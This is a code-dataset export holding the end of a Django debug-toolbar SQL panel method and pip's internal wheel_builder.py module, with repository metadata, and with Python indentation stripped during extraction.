unwrap_cursor(connection)
def process_response(self, request, response):
colors = contrasting_color_generator()
trace_colors = defaultdict(lambda: next(colors))
query_duplicates = defaultdict(lambda: defaultdict(int))
if self._queries:
width_ratio_tally = 0
factor = int(256.0 / (len(self._databases) * 2.5))
for n, db in enumerate(self._databases.values()):
rgb = [0, 0, 0]
color = n % 3
rgb[color] = 256 - n / 3 * factor
nn = color
# XXX: pretty sure this is horrible after so many aliases
while rgb[color] < factor:
nc = min(256 - rgb[color], 256)
rgb[color] += nc
nn += 1
if nn > 2:
nn = 0
rgb[nn] = nc
db['rgb_color'] = rgb
trans_ids = {}
trans_id = None
i = 0
for alias, query in self._queries:
query_duplicates[alias][query["raw_sql"]] += 1
trans_id = query.get('trans_id')
last_trans_id = trans_ids.get(alias)
if trans_id != last_trans_id:
if last_trans_id:
self._queries[(i - 1)][1]['ends_trans'] = True
trans_ids[alias] = trans_id
if trans_id:
query['starts_trans'] = True
if trans_id:
query['in_trans'] = True
query['alias'] = alias
if 'iso_level' in query:
query['iso_level'] = get_isolation_level_display(query['vendor'],
query['iso_level'])
if 'trans_status' in query:
query['trans_status'] = get_transaction_status_display(query['vendor'],
query['trans_status'])
query['form'] = SQLSelectForm(auto_id=None, initial=copy(query))
if query['sql']:
query['sql'] = reformat_sql(query['sql'])
query['rgb_color'] = self._databases[alias]['rgb_color']
try:
query['width_ratio'] = (query['duration'] / self._sql_time) * 100
query['width_ratio_relative'] = (
100.0 * query['width_ratio'] / (100.0 - width_ratio_tally))
except ZeroDivisionError:
query['width_ratio'] = 0
query['width_ratio_relative'] = 0
query['start_offset'] = width_ratio_tally
query['end_offset'] = query['width_ratio'] + query['start_offset']
width_ratio_tally += query['width_ratio']
query['stacktrace'] = render_stacktrace(query['stacktrace'])
i += 1
query['trace_color'] = trace_colors[query['stacktrace']]
if trans_id:
self._queries[(i - 1)][1]['ends_trans'] = True
# Queries are duplicates only if there's as least 2 of them.
# Also, to hide queries, we need to give all the duplicate groups an id
query_duplicates = dict(
(alias, dict(
(query, duplicate_count)
for query, duplicate_count in queries.items()
if duplicate_count >= 2
))
for alias, queries in query_duplicates.items()
)
for alias, query in self._queries:
try:
duplicates_count = query_duplicates[alias][query["raw_sql"]]
query["duplicate_count"] = duplicates_count
except KeyError:
pass
for alias, alias_info in self._databases.items():
try:
alias_info["duplicate_count"] = sum(e for e in query_duplicates[alias].values())
except KeyError:
pass
self.record_stats({
'databases': sorted(self._databases.items(), key=lambda x: -x[1]['time_spent']),
'queries': [q for a, q in self._queries],
'sql_time': self._sql_time,
})
| [
"[email protected]"
] | |
f970ef6d795cca42f5cd5e6541386bd098a7e5cb | 78db5bc74181173f2d00bea409997a64b4682adf | /venv/lib/python3.9/site-packages/pip/_internal/wheel_builder.py | 8ec908621ba0201832d4a81a6ab66338fa6db45a | [
"MIT"
] | permissive | CiscoDevNet/meraki-code | dfe680f077ebd053a3b663f1434f648f5a91b541 | d031aab82e3fa5ce7cf57b257fef8c9a4c63d71e | refs/heads/master | 2023-05-28T18:43:28.848983 | 2022-04-11T19:45:19 | 2022-04-11T19:45:19 | 188,288,487 | 67 | 60 | MIT | 2023-05-23T00:51:58 | 2019-05-23T18:43:15 | Python | UTF-8 | Python | false | false | 12,202 | py | """Orchestrator for building wheels from InstallRequirements.
"""
import logging
import os.path
import re
import shutil
import zipfile
from pip._vendor.packaging.utils import canonicalize_name, canonicalize_version
from pip._vendor.packaging.version import InvalidVersion, Version
from pip._vendor.pkg_resources import Distribution
from pip._internal.exceptions import InvalidWheelFilename, UnsupportedWheel
from pip._internal.models.link import Link
from pip._internal.models.wheel import Wheel
from pip._internal.operations.build.wheel import build_wheel_pep517
from pip._internal.operations.build.wheel_legacy import build_wheel_legacy
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import ensure_dir, hash_file, is_wheel_installed
from pip._internal.utils.setuptools_build import make_setuptools_clean_args
from pip._internal.utils.subprocess import call_subprocess
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.utils.urls import path_to_url
from pip._internal.utils.wheel import pkg_resources_distribution_for_wheel
from pip._internal.vcs import vcs
if MYPY_CHECK_RUNNING:
from typing import Any, Callable, Iterable, List, Optional, Tuple
from pip._internal.cache import WheelCache
from pip._internal.req.req_install import InstallRequirement
BinaryAllowedPredicate = Callable[[InstallRequirement], bool]
BuildResult = Tuple[List[InstallRequirement], List[InstallRequirement]]
logger = logging.getLogger(__name__)
_egg_info_re = re.compile(r'([a-z0-9_.]+)-([a-z0-9_.!+-]+)', re.IGNORECASE)
def _contains_egg_info(s):
# type: (str) -> bool
"""Determine whether the string looks like an egg_info.
:param s: The string to parse. E.g. foo-2.1
"""
return bool(_egg_info_re.search(s))
def _should_build(
req, # type: InstallRequirement
need_wheel, # type: bool
check_binary_allowed, # type: BinaryAllowedPredicate
):
# type: (...) -> bool
"""Return whether an InstallRequirement should be built into a wheel."""
if req.constraint:
# never build requirements that are merely constraints
return False
if req.is_wheel:
if need_wheel:
logger.info(
'Skipping %s, due to already being wheel.', req.name,
)
return False
if need_wheel:
# i.e. pip wheel, not pip install
return True
# From this point, this concerns the pip install command only
# (need_wheel=False).
if req.editable or not req.source_dir:
return False
if req.use_pep517:
return True
if not check_binary_allowed(req):
logger.info(
"Skipping wheel build for %s, due to binaries "
"being disabled for it.", req.name,
)
return False
if not is_wheel_installed():
# we don't build legacy requirements if wheel is not installed
logger.info(
"Using legacy 'setup.py install' for %s, "
"since package 'wheel' is not installed.", req.name,
)
return False
return True
def should_build_for_wheel_command(
req, # type: InstallRequirement
):
# type: (...) -> bool
return _should_build(
req, need_wheel=True, check_binary_allowed=_always_true
)
def should_build_for_install_command(
req, # type: InstallRequirement
check_binary_allowed, # type: BinaryAllowedPredicate
):
# type: (...) -> bool
return _should_build(
req, need_wheel=False, check_binary_allowed=check_binary_allowed
)
def _should_cache(
req, # type: InstallRequirement
):
# type: (...) -> Optional[bool]
"""
Return whether a built InstallRequirement can be stored in the persistent
wheel cache, assuming the wheel cache is available, and _should_build()
has determined a wheel needs to be built.
"""
if req.editable or not req.source_dir:
# never cache editable requirements
return False
if req.link and req.link.is_vcs:
# VCS checkout. Do not cache
# unless it points to an immutable commit hash.
assert not req.editable
assert req.source_dir
vcs_backend = vcs.get_backend_for_scheme(req.link.scheme)
assert vcs_backend
if vcs_backend.is_immutable_rev_checkout(req.link.url, req.source_dir):
return True
return False
assert req.link
base, ext = req.link.splitext()
if _contains_egg_info(base):
return True
# Otherwise, do not cache.
return False
def _get_cache_dir(
req, # type: InstallRequirement
wheel_cache, # type: WheelCache
):
# type: (...) -> str
"""Return the persistent or temporary cache directory where the built
wheel need to be stored.
"""
cache_available = bool(wheel_cache.cache_dir)
assert req.link
if cache_available and _should_cache(req):
cache_dir = wheel_cache.get_path_for_link(req.link)
else:
cache_dir = wheel_cache.get_ephem_path_for_link(req.link)
return cache_dir
def _always_true(_):
# type: (Any) -> bool
return True
def _get_metadata_version(dist):
# type: (Distribution) -> Optional[Version]
for line in dist.get_metadata_lines(dist.PKG_INFO):
if line.lower().startswith("metadata-version:"):
value = line.split(":", 1)[-1].strip()
try:
return Version(value)
except InvalidVersion:
msg = "Invalid Metadata-Version: {}".format(value)
raise UnsupportedWheel(msg)
raise UnsupportedWheel("Missing Metadata-Version")
def _verify_one(req, wheel_path):
# type: (InstallRequirement, str) -> None
canonical_name = canonicalize_name(req.name)
w = Wheel(os.path.basename(wheel_path))
if canonicalize_name(w.name) != canonical_name:
raise InvalidWheelFilename(
"Wheel has unexpected file name: expected {!r}, "
"got {!r}".format(canonical_name, w.name),
)
with zipfile.ZipFile(wheel_path, allowZip64=True) as zf:
dist = pkg_resources_distribution_for_wheel(
zf, canonical_name, wheel_path,
)
if canonicalize_version(dist.version) != canonicalize_version(w.version):
raise InvalidWheelFilename(
"Wheel has unexpected file name: expected {!r}, "
"got {!r}".format(dist.version, w.version),
)
if (_get_metadata_version(dist) >= Version("1.2")
and not isinstance(dist.parsed_version, Version)):
raise UnsupportedWheel(
"Metadata 1.2 mandates PEP 440 version, "
"but {!r} is not".format(dist.version)
)
def _build_one(
req, # type: InstallRequirement
output_dir, # type: str
verify, # type: bool
build_options, # type: List[str]
global_options, # type: List[str]
):
# type: (...) -> Optional[str]
"""Build one wheel.
:return: The filename of the built wheel, or None if the build failed.
"""
try:
ensure_dir(output_dir)
except OSError as e:
logger.warning(
"Building wheel for %s failed: %s",
req.name, e,
)
return None
# Install build deps into temporary directory (PEP 518)
with req.build_env:
wheel_path = _build_one_inside_env(
req, output_dir, build_options, global_options
)
if wheel_path and verify:
try:
_verify_one(req, wheel_path)
except (InvalidWheelFilename, UnsupportedWheel) as e:
logger.warning("Built wheel for %s is invalid: %s", req.name, e)
return None
return wheel_path
def _build_one_inside_env(
req, # type: InstallRequirement
output_dir, # type: str
build_options, # type: List[str]
global_options, # type: List[str]
):
# type: (...) -> Optional[str]
with TempDirectory(kind="wheel") as temp_dir:
assert req.name
if req.use_pep517:
assert req.metadata_directory
wheel_path = build_wheel_pep517(
name=req.name,
backend=req.pep517_backend,
metadata_directory=req.metadata_directory,
build_options=build_options,
tempd=temp_dir.path,
)
else:
wheel_path = build_wheel_legacy(
name=req.name,
setup_py_path=req.setup_py_path,
source_dir=req.unpacked_source_directory,
global_options=global_options,
build_options=build_options,
tempd=temp_dir.path,
)
if wheel_path is not None:
wheel_name = os.path.basename(wheel_path)
dest_path = os.path.join(output_dir, wheel_name)
try:
wheel_hash, length = hash_file(wheel_path)
shutil.move(wheel_path, dest_path)
logger.info('Created wheel for %s: '
'filename=%s size=%d sha256=%s',
req.name, wheel_name, length,
wheel_hash.hexdigest())
logger.info('Stored in directory: %s', output_dir)
return dest_path
except Exception as e:
logger.warning(
"Building wheel for %s failed: %s",
req.name, e,
)
# Ignore return, we can't do anything else useful.
if not req.use_pep517:
_clean_one_legacy(req, global_options)
return None
def _clean_one_legacy(req, global_options):
# type: (InstallRequirement, List[str]) -> bool
clean_args = make_setuptools_clean_args(
req.setup_py_path,
global_options=global_options,
)
logger.info('Running setup.py clean for %s', req.name)
try:
call_subprocess(clean_args, cwd=req.source_dir)
return True
except Exception:
logger.error('Failed cleaning build dir for %s', req.name)
return False
def build(
requirements, # type: Iterable[InstallRequirement]
wheel_cache, # type: WheelCache
verify, # type: bool
build_options, # type: List[str]
global_options, # type: List[str]
):
# type: (...) -> BuildResult
"""Build wheels.
:return: The list of InstallRequirement that succeeded to build and
the list of InstallRequirement that failed to build.
"""
if not requirements:
return [], []
# Build the wheels.
logger.info(
'Building wheels for collected packages: %s',
', '.join(req.name for req in requirements), # type: ignore
)
with indent_log():
build_successes, build_failures = [], []
for req in requirements:
cache_dir = _get_cache_dir(req, wheel_cache)
wheel_file = _build_one(
req, cache_dir, verify, build_options, global_options
)
if wheel_file:
# Update the link for this.
req.link = Link(path_to_url(wheel_file))
req.local_file_path = req.link.file_path
assert req.link.is_wheel
build_successes.append(req)
else:
build_failures.append(req)
# notify success/failure
if build_successes:
logger.info(
'Successfully built %s',
' '.join([req.name for req in build_successes]), # type: ignore
)
if build_failures:
logger.info(
'Failed to build %s',
' '.join([req.name for req in build_failures]), # type: ignore
)
# Return a list of requirements that failed to build
return build_successes, build_failures
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.